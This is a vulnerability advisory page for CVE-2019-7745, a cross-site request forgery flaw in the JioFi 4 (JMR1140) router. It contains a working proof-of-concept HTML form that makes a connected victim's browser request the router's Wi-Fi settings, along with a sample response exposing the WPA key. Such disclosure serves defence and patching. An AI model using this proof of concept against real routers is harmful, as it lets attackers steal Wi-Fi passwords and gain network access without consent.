Jiofi 4 (JMR 1140) WiFi Password Cross Site Request Forgery

2019.02.14
Credit: Ronnie T Baby
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password # Date: 12.02.2019 # Exploit Author: Ronnie T Baby # Contact:https://www.linkedin.com/in/ronnietbaby # Vendor Homepage: www.jio.com # Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 # Category: Hardware (Wifi Router) # Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07 # Tested on: Ubuntu 18.04 # CVE: CVE-2019-7745 Description: JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field. POC- 1. Create a view.html and insert <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST"> <input type="hidden" name="Page" value="GetWiFi&#95;Setting" /> <input type="hidden" name="Mask" value="0" /> <input type="hidden" name="result" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2. Send to victim(who is connected to the wifi network). 3. The response gives the current wifi password. Example response- {"Page":"GetWiFi_Setting","Mask":"0","result":"SUCCESS","ssid":"JioFi4_08FE5F","mode_802_11":"11bgn","tx_power":"MID", "wmm":"Enable","wps_enable":"PushButton","wifi_security":"WPA2PSK","wpa_encryption_type":"AES", "wpa_security_key":"leakedpassword",".....etc} Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top